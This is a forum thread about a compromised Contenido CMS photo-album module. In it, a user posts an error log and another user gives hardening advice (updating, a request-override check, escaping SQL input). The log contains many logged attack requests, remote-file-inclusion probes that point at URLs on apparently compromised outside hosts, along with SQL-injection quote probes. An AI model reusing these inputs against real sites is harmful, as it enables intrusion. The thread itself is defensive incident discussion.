Compromised sites?


Post by Supporter

Good grief

Well, I could hardly believe it today when a customer called me and told me that his web host had warned him about the "mass mailing" of e-mail.

Well, I took action immediately, but it doesn't look good.

On all three sites I use the module "Modul Fotoalbum" by OmaWetterwax. I then had a look at the error log and am now not quite sure. Who can interpret the log for me?

Code:

 * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.unduetretoccaate.it/codice/fog/biko/,14
[06-Jun-2008 12:52:35] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Ffog%2Fbiko%2F next_record called with no query pending in Module ID 55.
[06-Jun-2008 12:52:38] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.bowlaw.com%2Fpractice_areas%2Fogi%2Fiteyu%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.bowlaw.com/practice_areas/ogi/iteyu/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.bowlaw.com/practice_areas/ogi/iteyu/,14
[06-Jun-2008 12:52:38] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.bowlaw.com%2Fpractice_areas%2Fogi%2Fiteyu%2F next_record called with no query pending in Module ID 55.
[17-Jun-2008 20:17:10] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Ffog%2Fbiko%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.unduetretoccaate.it/codice/fog/biko/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.unduetretoccaate.it/codice/fog/biko/,14
[17-Jun-2008 20:17:10] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Ffog%2Fbiko%2F next_record called with no query pending in Module ID 55.
[17-Jun-2008 20:17:14] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Frabotnitsa.ru%2Fjoomla__%2Fadministrator%2Fbackups%2Farim%2Fzaf%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://rabotnitsa.ru/joomla__/administrator/backups/arim/zaf/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://rabotnitsa.ru/joomla__/administrator/backups/arim/zaf/,14
[17-Jun-2008 20:17:14] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Frabotnitsa.ru%2Fjoomla__%2Fadministrator%2Fbackups%2Farim%2Fzaf%2F next_record called with no query pending in Module ID 55.
[17-Jun-2008 20:17:17] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.filter-international.com%2Fwebservice%2Faro%2Fpefosi%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.filter-international.com/webservice/aro/pefosi/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.filter-international.com/webservice/aro/pefosi/,14
[17-Jun-2008 20:17:17] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.filter-international.com%2Fwebservice%2Faro%2Fpefosi%2F next_record called with no query pending in Module ID 55.
[17-Jun-2008 20:17:26] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=28\' MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\',14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT 28\',14
[17-Jun-2008 20:17:26] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=28\' next_record called with no query pending in Module ID 55.
[18-Jun-2008 01:50:14] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Frabotnitsa.ru%2Fjoomla__%2Fadministrator%2Fbackups%2Farim%2Fzaf%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://rabotnitsa.ru/joomla__/administrator/backups/arim/zaf/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://rabotnitsa.ru/joomla__/administrator/backups/arim/zaf/,14
[18-Jun-2008 01:50:14] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Frabotnitsa.ru%2Fjoomla__%2Fadministrator%2Fbackups%2Farim%2Fzaf%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 01:50:17] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Focoyo%2Fser%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.northfans.ch/forum/admin/settings/ocoyo/ser/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.northfans.ch/forum/admin/settings/ocoyo/ser/,14
[18-Jun-2008 01:50:17] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Focoyo%2Fser%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 01:50:19] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fstoneproperties.co.uk%2Falbum%2Fincludes%2Fnohul%2Fzojaz%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://stoneproperties.co.uk/album/includes/nohul/zojaz/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://stoneproperties.co.uk/album/includes/nohul/zojaz/,14
[18-Jun-2008 01:50:19] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fstoneproperties.co.uk%2Falbum%2Fincludes%2Fnohul%2Fzojaz%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 01:50:24] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=42\' MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\',14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT 42\',14
[18-Jun-2008 01:50:24] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=42\' next_record called with no query pending in Module ID 55.
[18-Jun-2008 03:39:44] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.service-exposants.com%2Fstore%2Fiyi%2Fzobakiq%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.service-exposants.com/store/iyi/zobakiq/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.service-exposants.com/store/iyi/zobakiq/,14
[18-Jun-2008 03:39:44] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.service-exposants.com%2Fstore%2Fiyi%2Fzobakiq%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 03:39:46] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Frix%2Fjas%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.psikolojikyardim.org/etkinlik/include/eto/rix/jas/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.psikolojikyardim.org/etkinlik/include/eto/rix/jas/,14
[18-Jun-2008 03:39:46] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Frix%2Fjas%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 03:39:48] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.interkonet.com%2Fgaleria%2Fmodules%2Falbumselect%2Fucu%2Fyixipuz%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.interkonet.com/galeria/modules/albumselect/ucu/yixipuz/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.interkonet.com/galeria/modules/albumselect/ucu/yixipuz/,14
[18-Jun-2008 03:39:48] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.interkonet.com%2Fgaleria%2Fmodules%2Falbumselect%2Fucu%2Fyixipuz%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 03:39:52] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=56\' MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\',14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT 56\',14
[18-Jun-2008 03:39:52] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=56\' next_record called with no query pending in Module ID 55.
[18-Jun-2008 05:40:12] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Ftimuji%2Fjaborat%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.thoseguysfilms.com/forums/templates/subSilver/images/timuji/jaborat/,' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.thoseguysfilms.com/forums/templates/subSilver/images/timuji/jaborat/,14
[18-Jun-2008 05:40:12] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Ftimuji%2Fjaborat%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 05:40:14] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.jyvaskylankirjastot.fi%2Fyhteistyo%2Fwd%2Fmuji%2Frenula%2Fxejado%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.jyvaskylankirjastot.fi/yhteistyo/wd/muji/renula/xejado/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.jyvaskylankirjastot.fi/yhteistyo/wd/muji/renula/xejado/,14
[18-Jun-2008 05:40:14] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.jyvaskylankirjastot.fi%2Fyhteistyo%2Fwd%2Fmuji%2Frenula%2Fxejado%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 05:40:15] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fseq%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.landisempach-emmen.ch/aktionen/image/ezu/seq/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.landisempach-emmen.ch/aktionen/image/ezu/seq/,14
[18-Jun-2008 05:40:15] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fseq%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 05:40:17] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=14\' MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\',14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT 14\',14
[18-Jun-2008 05:40:17] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=14\' next_record called with no query pending in Module ID 55.
[18-Jun-2008 10:53:59] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Falameja%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.qubestunes.com/treytest/1/adoyuru/alameja/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.qubestunes.com/treytest/1/adoyuru/alameja/,14
[18-Jun-2008 10:53:59] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Falameja%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 10:54:02] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Frix%2Fjas%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.psikolojikyardim.org/etkinlik/include/eto/rix/jas/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.psikolojikyardim.org/etkinlik/include/eto/rix/jas/,14
[18-Jun-2008 10:54:02] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Frix%2Fjas%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 10:54:05] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.stomol.ru%2Fcatalog%2Frivoz%2Fifewaf%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.stomol.ru/catalog/rivoz/ifewaf/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.stomol.ru/catalog/rivoz/ifewaf/,14
[18-Jun-2008 10:54:05] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.stomol.ru%2Fcatalog%2Frivoz%2Fifewaf%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 10:54:13] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=14\' MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\',14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT 14\',14
[18-Jun-2008 10:54:13] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=14\' next_record called with no query pending in Module ID 55.
[21-Jun-2008 00:46:02] /contenido/plugins/mod_rewrite/install.php?install=1&contenido=dc9ca6d3dcfdb7303f24daaf03bed91e MySQL error 1060: Duplicate column name 'urlname'
ALTER TABLE con_art_lang ADD urlname VARCHAR( 128 ) AFTER title
[21-Jun-2008 01:02:17] /bilderarchiv/warnstreik-tks-fi-18.2.2008.html MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SET foto_pos='',foto_text='' WHERE foto_id = ''' at line 1
UPDATE  SET foto_pos='',foto_text='' WHERE foto_id = ''
[21-Jun-2008 01:02:17] PHP Warning:  mysql_num_rows(): supplied argument is not a valid MySQL result resource in /homepages/28/d232825338/htdocs/ftp.{deleted}.de/www.{deleted}.de/cms/front_content.php(955) : eval()'d code on line 1260

Post by frederic.schneider_4fb

Hello,

First of all, I strongly recommend that you update to the current Contenido versions 4.6.24 or 4.8.6. Next, check whether there are new versions of the modules you use. If something like include_once($cfg['path']...) exists in the source code, you should urgently put the following at the beginning of the script/module:

Code:

if(isset($_REQUEST['cfg'])) {
    die ('Illegal call!');
}

If a variable other than $cfg appears there, please adapt the if check accordingly.

If a variable is used in a database query ("SELECT ...", "ALTER TABLE ..." etc.), please use the function mysql_real_escape_string(). Example:

Code:

$query = "SELECT * FROM con_art WHERE idart = '" . mysql_real_escape_string($_GET['id'], $db->Link_ID) . "'";
$db->Query($query);